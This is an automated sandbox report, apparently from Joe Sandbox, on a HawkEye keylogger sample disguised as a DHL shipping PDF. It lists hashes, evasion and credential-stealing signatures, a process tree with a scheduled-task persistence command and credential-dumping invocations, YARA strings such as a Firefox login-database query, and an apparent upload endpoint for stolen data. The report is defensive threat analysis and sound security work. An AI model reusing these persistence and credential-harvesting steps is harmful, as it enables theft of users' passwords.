Windows Analysis Report DHL_AWB 518877882999_887755468_pdf.exe

Overview

General Information

Sample Name: DHL_AWB 518877882999_887755468_pdf.exe
Analysis ID: 502165
MD5: 7d11e82579e2a0628ca3c855afe34fd1
SHA1: d6abbbe7f991e79c3bc51480314386c0cce5f2b9
SHA256: 691cb999c6be0f430c14a9411abf6796f174c8d8f3c3edc4b819b3b35972d832
Tags: DHL, exe, HawkEye
Most interesting Screenshot:

Detection

HawkEye, MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected MailPassView
Multi AV Scanner detection for submitted file
Yara detected HawkEye Keylogger
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected AntiVM3
Detected unpacking (changes PE section rights)
Detected HawkEye Rat
Sample uses process hollowing technique
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
.NET source code references suspicious native API functions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Yara detected WebBrowserPassView password recovery tool
Machine Learning detection for dropped file
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • DHL_AWB 518877882999_887755468_pdf.exe (PID: 2172 cmdline: 'C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe' MD5: 7D11E82579E2A0628CA3C855AFE34FD1)
    • schtasks.exe (PID: 5984 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cmsyNzu' /XML 'C:\Users\user\AppData\Local\Temp\tmp70BF.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • DHL_AWB 518877882999_887755468_pdf.exe (PID: 2960 cmdline: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe MD5: 7D11E82579E2A0628CA3C855AFE34FD1)
      • vbc.exe (PID: 5232 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp1B0D.tmp' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 6168 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp11A3.tmp' MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000007.00000002.525571222.000000000330E000.00000004.00000001.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp | MAL_HawkEye_Keylogger_Gen_Dec18 | Detects HawkEye Keylogger Reborn | Florian Roth
  • 0x88246:$s1: HawkEye Keylogger
  • 0x882af:$s1: HawkEye Keylogger
  • 0x81689:$s2: _ScreenshotLogger
  • 0x81656:$s3: _PasswordStealer
00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security
00000007.00000002.528296707.0000000007D90000.00000004.00020000.sdmp | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth
  • 0x6b4fa:$a1: logins.json
  • 0x6b45a:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x6bc7e:$s4: \mozsqlite3.dll
  • 0x6a4ee:$s5: SMTP Password
00000007.00000002.528296707.0000000007D90000.00000004.00020000.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
(24 entries in the full list; only the first are shown here)

Unpacked PEs

Source | Rule | Description | Author
7.2.DHL_AWB 518877882999_887755468_pdf.exe.7de834a.4.unpack | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth
  • 0x11bb0:$a1: logins.json
  • 0x11b10:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x12334:$s4: \mozsqlite3.dll
  • 0x115a4:$s5: SMTP Password
7.2.DHL_AWB 518877882999_887755468_pdf.exe.7de834a.4.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
7.3.DHL_AWB 518877882999_887755468_pdf.exe.4abdbda.2.raw.unpack | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth
  • 0x131b0:$a1: logins.json
  • 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x13934:$s4: \mozsqlite3.dll
  • 0x121a4:$s5: SMTP Password
7.3.DHL_AWB 518877882999_887755468_pdf.exe.4abdbda.2.raw.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
7.2.DHL_AWB 518877882999_887755468_pdf.exe.4291990.2.unpack | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth
  • 0x11bb0:$a1: logins.json
  • 0x11b10:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x12334:$s4: \mozsqlite3.dll
  • 0x115a4:$s5: SMTP Password
(58 entries in the full list; only the first are shown here)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: DHL_AWB 518877882999_887755468_pdf.exe | Virustotal: Detection: 33%
Machine Learning detection for sample
Source: DHL_AWB 518877882999_887755468_pdf.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\cmsyNzu.exe | Joe Sandbox ML: detected
Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.f40000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Unpacked PE file: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.f40000.0.unpack
Source: DHL_AWB 518877882999_887755468_pdf.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: DHL_AWB 518877882999_887755468_pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb | source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exe
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb | source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.525571222.000000000330E000.00000004.00000001.sdmp, vbc.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 11_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen, 11_2_0040938F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 11_2_00408CAC FindFirstFileW,FindNextFileW,FindClose, 11_2_00408CAC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 24_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen, 24_2_0040702D
Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 0_2_058C9C78
Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 0_2_058C69AC
Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exe, 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exe, 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | String found in binary or memory: http://bot.whatismyipaddress.com/
Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.php
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.php&https://a.pomf.cat/
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.phpCContent-Disposition:
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/3011883223893104794?gdpr=1&euconsent=BOi01ZPOi01ZPAcABBENB4-AAA
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/3011883223893104794?gdpr=1&gdpr_consent=BOi01ZPOi01ZPAcABBENB4-
            Source: vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: http://s.amazon-adsystem.com/v3/pr?exlist=an&fv=1.0&a=cm&cm3ppd=1
            Source: vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: http://s.amazon-adsystem.com/x/da2e6c890e6e3636
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://sb.scorecardresearch.com/beacon.js
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://secure.globalsign.com/cacert/cloudsslsha2g3.crt06
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/44/c08e43.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/52/8adb60.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/8c/865070.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/95/8bd8bf.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AABzUSt.img?h=368&w=622
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsAOZ.img?h=166&w=310
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsWyr.img?h=75&w=100&
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsZuW.img?h=166&w=310
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuMD0.img?h=333&w=311
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv9IZ.img?h=75&w=100&
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=75&w=100&
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=166&w=310
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=75&w=100&
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhax.img?h=166&w=310
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvqEs.img?h=166&w=310
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvuGs.img?h=333&w=311
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvzqT.img?h=166&w=310
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true&
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBGjoVB.img?h=50&w=50&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBIbOGs.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMVUFn.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPRPvf.img?h=50&w=50&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBS0Ogx.img?h=75&w=100&
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBSDdmG.img?h=50&w=50&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBTrj40.img?h=50&w=50&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVBUge.img?h=50&w=50&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVQ7lO.img?h=50&w=50&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuaWG.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://t.wayfair.com/a/vendor_sync/user?vendor_id=1&uid=3011883223893104794&t=1
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://trc.taboola.com/p3p.xml
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000003.253368565.0000000001A9B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn01
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://www.googleadservices.com/pagead/p3p.xml
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://www.msn.com
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://www.msn.com/
            Source: vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: http://www.msn.com/?ocid=iehp
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
            Source: vbc.exe, 0000000B.00000002.301955681.000000000019C000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net
